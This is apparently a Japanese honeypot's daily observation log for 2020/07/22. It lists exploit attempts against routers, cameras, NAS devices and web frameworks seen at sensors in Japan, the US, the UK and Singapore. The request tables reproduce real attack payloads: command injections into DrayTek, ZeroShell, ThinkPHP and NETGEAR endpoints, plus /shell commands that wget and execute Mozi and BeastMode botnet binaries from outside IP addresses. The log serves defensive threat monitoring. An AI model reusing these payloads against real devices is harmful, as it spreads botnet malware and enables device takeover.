ハニーポット(仮) 観測記録 2020/07/22分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。
Location:US
Asustor NASの脆弱性を狙うアクセス
ASUS modemの脆弱性を狙うアクセス
AVTECH IP Camera/NVR/DVR Devicesの脆弱性を狙うアクセス
Dell KACE Systems Management Applianceの脆弱性を狙うアクセス
DLink製品の脆弱性を狙うアクセス
EnGenius EnShare IoT Gigabit Cloud Serviceの脆弱性を狙うアクセス
Enigma NMSの脆弱性を狙うアクセス
Geutebruck IP Cameraの脆弱性を狙うアクセス
GoAhead IP Cameraの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Huaweiルータの脆弱性を狙うアクセス
HooToo TripMaterルータの脆弱性を狙うアクセス
LG Supersignの脆弱性を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
Linksys E-series devicesの脆弱性を狙うアクセス
MiCasa VeraLit Smart home controllerの脆弱性を狙うアクセス
NetGain Enterprise Managerの脆弱性を狙うアクセスの脆弱性を狙うアクセス
Netgear ReadyNasの脆弱性を狙うアクセス
NUUO NVRminiの脆弱性を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
Schneider Electric U.motion LifeSpace Management Systemの脆弱性(CVE-2018-7841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Vacron NVR Devicesの脆弱性を狙うアクセス
VMware NSX SD-WAN Edgeの脆弱性(CVE-2018-6961)を狙うアクセス
WePresent Wireless Presentation Systemの脆弱性を狙うアクセス
Wireless Presentation Systemの脆弱性(CVE-2019-3929)を狙うアクセス
ZTEルータの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
Googlebotによるスキャン行為
GoScraperによるスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
DrayTek製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 95.213.165.45/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 165.22.101.145/beastmode/b3astmode; chmod 777 /tmp/b3astmode; sh /tmp/b3astmode BeastMode.Rep.Jaws
他
アクセス数推移
JP:総アクセス数:60 (前日比:-37)
US:総アクセス数:242 (前日比:+102)
UK:総アクセス数:23 (前日比:-12)
SG:総アクセス数:28 (前日比:+13)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 5.188.210.227 | Russia |
6 | 52.176.48.56 | United States |
3 | 59.127.105.216 | Taiwan |
1 | 93.174.93.139 | Netherlands |
3 | 94.230.208.147 | Switzerland |
1 | 114.113.112.92 | China |
1 | 162.243.128.13 | United States |
27 | 180.240.191.222 | Singapore |
7 | 195.54.160.21 | Russia |
5 | 195.154.171.182 | France |
1 | 196.202.71.90 | Egypt |
1 | 200.119.45.66 | Colombia |
UserAgent一覧
件数 | UserAgent |
---|---|
40 | - |
3 | Go-http-client/1.1 |
5 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
1 | Mozilla/5.0 zgrab/0.x |
1 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - | ||
3 | \x16\x03\x01 | ||
2 | GET | /.env | HTTP/1.1 |
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
27 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /muieblackcat | HTTP/1.1 |
1 | GET | /portal/.env | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /v2/_catalog | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | HTTP/1.1 | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 37.49.224.33 | Estonia |
1 | 49.89.3.63 | China |
1 | 61.219.11.153 | Taiwan |
1 | 80.82.70.118 | Netherlands |
197 | 89.144.47.5 | Germany |
1 | 93.174.93.139 | Netherlands |
1 | 104.131.8.207 | United States |
1 | 104.131.13.221 | United States |
20 | 107.167.7.226 | United States |
10 | 129.28.172.238 | China |
4 | 139.205.177.97 | China |
1 | 222.240.117.51 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
24 | GoScraper |
173 | Googlebot/2.1 (+http://www.google.com/bot.html) |
1 | Hello, World |
1 | Hello, world |
4 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488) |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 |
20 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
3 | \x16\x03\x01 | ||
1 | \x16\x03\x02\x01o\x01 | ||
1 | GET | /.env | HTTP/1.1 |
1 | GET | /.local | HTTP/1.1 |
1 | GET | /.production | HTTP/1.1 |
1 | GET | /.remote | HTTP/1.1 |
1 | GET | //app/.env | HTTP/1.1 |
1 | GET | //apps/.env | HTTP/1.1 |
1 | GET | //assets/.env | HTTP/1.1 |
1 | GET | //config/.env | HTTP/1.1 |
1 | GET | //core/.env | HTTP/1.1 |
1 | GET | //core/Datavase/.env | HTTP/1.1 |
1 | GET | //core/app/.env | HTTP/1.1 |
1 | GET | //cron/.env | HTTP/1.1 |
1 | GET | //cronlab/.env | HTTP/1.1 |
1 | GET | //database/.env | HTTP/1.1 |
1 | GET | //lab/.env | HTTP/1.1 |
1 | GET | //lib/.env | HTTP/1.1 |
1 | GET | //saas/.env | HTTP/1.1 |
1 | GET | //sitemaps/.env | HTTP/1.1 |
1 | GET | //uploads/.env | HTTP/1.1 |
1 | GET | //vendor/.env | HTTP/1.1 |
1 | GET | /Diagnostics.asp | HTTP/1.1 |
1 | GET | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /Main_Analysis_Content.asp | HTTP/1.1 |
2 | GET | /NonExistence | HTTP/1.1 |
1 | GET | /OvCgi/connectedNodes.ovpl | HTTP/1.1 |
1 | GET | /SGPAdmin/fileRequest | HTTP/1.1 |
1 | GET | /SetSmarcardSettings.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /UD/act | HTTP/1.1 |
1 | GET | /VhttpdMgr | HTTP/1.1 |
1 | GET | /_async/AsyncResponseServiceHttps | HTTP/1.1 |
1 | GET | /_search | HTTP/1.1 |
1 | GET | /action.php | HTTP/1.1 |
1 | GET | /actionHandler/ajax_network_diagnostic_tools.php | HTTP/1.1 |
1 | GET | /adm.php | HTTP/1.1 |
1 | GET | /admin.cgi | HTTP/1.1 |
1 | GET | /adminer.php | HTTP/1.1 |
1 | GET | /adv,/cgi-bin/weblogin.cgi | HTTP/1.1 |
1 | GET | /api/backup/logout.cgi | HTTP/1.1 |
2 | GET | /api/project/repo/log/graph/ | HTTP/1.1 |
1 | GET | /app/lan/BeforeLoginCn.js | HTTP/1.1 |
1 | GET | /apply.cgi | HTTP/1.1 |
1 | GET | /apps/a3/cfg_ethping.cgi | HTTP/1.1 |
1 | GET | /awcuser/cgi-bin/vcs | HTTP/1.1 |
1 | GET | /awstatstotals/awstatstotals.php | HTTP/1.1 |
1 | GET | /ayefeaturesconvert.js | HTTP/1.1 |
1 | GET | /boaform/admin/formPing | HTTP/1.1 |
1 | GET | /board.cgi | HTTP/1.1 |
1 | GET | /boardData102.php | HTTP/1.1 |
1 | GET | /boardData103.php | HTTP/1.1 |
1 | GET | /boardDataJP.php | HTTP/1.1 |
1 | GET | /boardDataNA.php | HTTP/1.1 |
2 | GET | /boardDataWW.php | HTTP/1.1 |
1 | GET | /card_scan_decoder.php | HTTP/1.0 |
1 | GET | /card_scan_decoder.php | HTTP/1.1 |
1 | GET | /ccbill/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi | HTTP/1.1 |
1 | GET | /cgi-bin/ViewLog.asp | HTTP/1.1 |
1 | GET | /cgi-bin/admin/servetest | HTTP/1.1 |
1 | GET | /cgi-bin/adv_remotelog.asp | HTTP/1.1 |
1 | GET | /cgi-bin/apply.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/awstats.pl | HTTP/1.1 |
1 | GET | /cgi-bin/bconf.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/board.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/ccbill/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/cgiServer.exx | HTTP/1.1 |
1 | GET | /cgi-bin/cgi_system | HTTP/1.1 |
2 | GET | /cgi-bin/cgi_system?cmd=saveconfig | HTTP/1.1 |
1 | GET | /cgi-bin/ddns_start.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/diagnostic.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/file_transfer.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/getddnsattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getinetattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getnettype.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getupnp.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getwifiattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/getwifistatus.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/img.pl | HTTP/1.1 |
1 | GET | /cgi-bin/inetconfig.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/iptest.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet | HTTP/1.1 |
1 | GET | /cgi-bin/listwifiap.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/api/xqsmarthome/request_mitv | HTTP/1.1 |
2 | GET | /cgi-bin/luci/;stok=a1ec162fe4b3a17cdff58dcc960539ed/expert/maintenance/diagnostic/nslookup | HTTP/1.1 |
1 | GET | /cgi-bin/luci/;stok=a714f92968ab8cc6466f87c8618cfc30/api/misns/wifi_access | HTTP/1.1 |
1 | GET | /cgi-bin/luci/expert/maintenance/diagnostic/nslookup | HTTP/1.1 |
1 | GET | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/masterCGI | HTTP/1.1 |
1 | GET | /cgi-bin/nobody/Search.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/operator/servetest | HTTP/1.1 |
1 | GET | /cgi-bin/p2p.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/pages/maintenance/logSetting/logSet.asp | HTTP/1.1 |
1 | GET | /cgi-bin/paraconf.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/preview_email.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/protected/discover_and_manage.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/rdfs.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/scanwifi.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/script | HTTP/1.1 |
1 | GET | /cgi-bin/setadslattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/setddnsattr.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/setinetattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/setwifiattr.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/spboard/board.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/statuswml.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/system.cgi | HTTP/1.1 |
2 | GET | /cgi-bin/test | HTTP/1.1 |
1 | GET | /cgi-bin/tools_time.asp | HTTP/1.1 |
1 | GET | /cgi-bin/upnp_start.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/webcm | HTTP/1.1 |
1 | GET | /cgi-bin/webctrl.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/whereami.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/wifimode.cgi | HTTP/1.1 |
1 | GET | /cgi-bin/wifitest.cgi | HTTP/1.1 |
1 | GET | /command.php | HTTP/1.1 |
1 | GET | /csspwn.php | HTTP/1.1 |
1 | GET | /ctrlt/DeviceUpgrade_1 | HTTP/1.1 |
2 | GET | /debug.cgi | HTTP/1.1 |
1 | GET | /diagnostic.php | HTTP/1.1 |
1 | GET | /dnslookup.cgi | HTTP/1.1 |
1 | GET | /dogfood/mail/spell.php | HTTP/1.1 |
1 | GET | /editBlackAndWhiteList | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /getpage.gch | HTTP/1.1 |
1 | GET | /global_data/ | HTTP/1.1 |
1 | GET | /globe | HTTP/1.1 |
2 | GET | /goform/formSysCmd | HTTP/1.1 |
2 | GET | /goform/mp | HTTP/1.1 |
1 | GET | /goip/cron.htm | HTTP/1.1 |
1 | GET | /handle_iscsi.php | HTTP/1.1 |
1 | GET | /hndBlock.cgi | HTTP/1.1 |
1 | GET | /hndUnblock.cgi | HTTP/1.1 |
1 | GET | /horde/imp/test.php | HTTP/1.1 |
1 | GET | /html/SetSmarcardSettings.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /imp/test.php | HTTP/1.1 |
1 | GET | /incl/image_test.shtml | HTTP/1.1 |
1 | GET | /index.html?findcli=-1 | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /js/Multi_Language.js | HTTP/1.1 |
1 | GET | /language/Swedish | HTTP/1.1 |
1 | GET | /linuxki/experimental/vis/kivis.php | HTTP/1.1 |
2 | GET | /login.action | HTTP/1.1 |
1 | GET | /login.cgi | HTTP/1.1 |
1 | GET | /login.gch | HTTP/1.1 |
1 | GET | /login.php | HTTP/1.1 |
1 | GET | /login_handler.php | HTTP/1.1 |
2 | GET | /maintenance/controllerFlirSystem.php | HTTP/1.1 |
1 | GET | /maker/snwrite.cgi | HTTP/1.1 |
1 | GET | /mnt_ping.cgi | HTTP/1.1 |
1 | GET | /moadmin/moadmin.php | HTTP/1.1 |
1 | GET | /monitor/op5/nacoma/command_test.php | HTTP/1.1 |
2 | GET | /nagios/cgi-bin/statuswml.cgi | HTTP/1.1 |
1 | GET | /ona/ | HTTP/1.1 |
1 | GET | /op5config/welcome | HTTP/1.1 |
1 | GET | /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2 | HTTP/1.1 |
1 | GET | /page/maintenance/lanSettings/dns | HTTP/1.1 |
1 | GET | /pages/systemcall.php | HTTP/1.1 |
1 | GET | /parse_xml.cgi | HTTP/1.1 |
1 | GET | /phpMoAdmin/moadmin.php | HTTP/1.1 |
1 | GET | /phpmoadmin/moadmin.php | HTTP/1.1 |
1 | GET | /picsdesc.xml | HTTP/1.1 |
1 | GET | /ping.cgi | HTTP/1.1 |
1 | GET | /portal/apis/aggrecate_js.cgi | HTTP/1.1 |
1 | GET | /protocol.csp | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=php%20-r%20'phpinfo();' | HTTP/1.1 |
1 | GET | /qsr_server/device/getThumbnail | HTTP/1.1 |
1 | GET | /qsrserver/device/getThumbnail | HTTP/1.1 |
1 | GET | /recordings/misc/callme_page.php | HTTP/1.1 |
1 | GET | /repository/annotate | HTTP/1.1 |
1 | GET | /sarFILE/style.css | HTTP/1.1 |
1 | GET | /scripts/ajaxPortal.lua | HTTP/1.1 |
1 | GET | /scripts/rpc.php | HTTP/1.1 |
1 | GET | /sdwan/nitro/v1/config/get_package_file | HTTP/1.1 |
1 | GET | /service/krashrpt.php | HTTP/1.1 |
1 | GET | /setSystemCommand | HTTP/1.1 |
2 | GET | /set_ftp.cgi | HTTP/1.1 |
1 | GET | /setup.cgi | HTTP/1.1 |
1 | GET | /setup.xml | HTTP/1.1 |
1 | GET | /shell | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
2 | GET | /shell?echo+ukrmoney | HTTP/1.1 |
2 | GET | /smartdomuspad/modules/reporting/track_import_export.php | HTTP/1.1 |
1 | GET | /smb_scheduler/cdr.htm | HTTP/1.1 |
1 | GET | /soap.cgi | HTTP/1.1 |
1 | GET | /softnas/snserver/snserv.php | HTTP/1.1 |
1 | GET | /stainfo.cgi | HTTP/1.1 |
1 | GET | /system.ini?loginuse&loginpas | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /tmBlock.cgi | HTTP/1.1 |
1 | GET | /tmUnblock.cgi | HTTP/1.1 |
1 | GET | /u/jsp/tools/exec.jsp | HTTP/1.1 |
1 | GET | /uapi-cgi/admin/testaction.cgi | HTTP/1.1 |
1 | GET | /uapi-cgi/viewer/admin/testaction.cgi | HTTP/1.1 |
2 | GET | /uapi-cgi/viewer/simple_loglistjs.cgi | HTTP/1.1 |
1 | GET | /uapi-cgi/viewer/testaction.cgi | HTTP/1.1 |
2 | GET | /upgrade_handle.php | HTTP/1.1 |
2 | GET | /upnp/control/hag | HTTP/1.1 |
1 | GET | /user/register | HTTP/1.1 |
1 | GET | /utility.cgi | HTTP/1.1 |
1 | GET | /web/cgi-bin/usbinteract.cgi | HTTP/1.1 |
1 | GET | /webadmin/script | HTTP/1.1 |
1 | GET | /wls-wsat/CoordinatorPortType | HTTP/1.1 |
1 | GET | /wp-content/plugins/dzs-videogallery/img.php | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 60.246.11.234 | Macao |
4 | 80.82.77.33 | Netherlands |
1 | 89.248.168.39 | Netherlands |
1 | 93.174.93.139 | Netherlands |
1 | 96.69.158.193 | United States |
1 | 98.235.253.175 | United States |
2 | 143.92.32.86 | Singapore |
1 | 162.243.128.147 | United States |
1 | 190.94.192.8 | Venezuela |
1 | 192.241.233.249 | United States |
7 | 195.54.160.21 | Russia |
1 | 200.217.4.9 | Brazil |
1 | 223.149.252.240 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
9 | - |
1 | Hello, world |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | polaris botnet |
1 | python-requests/2.23.0 |
1 | python-requests/2.24.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | g[.]alicdn[.]com/:443 | HTTP/1.1 |
1 | CONNECT | httpbin[.]org/:443 | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
2 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.45/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 5.182.210.205 | Netherlands |
1 | 5.188.210.227 | Russia |
1 | 31.182.159.17 | Poland |
1 | 93.174.93.139 | Netherlands |
1 | 102.43.18.31 | Egypt |
1 | 159.18.94.65 | Canada |
1 | 161.97.81.64 | Germany |
1 | 162.243.128.57 | United States |
1 | 192.241.238.37 | United States |
14 | 195.54.160.21 | Russia |
3 | 195.154.171.182 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Hello, world |
3 | Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) |
14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | \x16\x03\x01 | ||
1 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /hudson | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /laravel/.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /public/.env | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+165.22.101.145/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | OPTIONS | * | HTTP/1.1 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |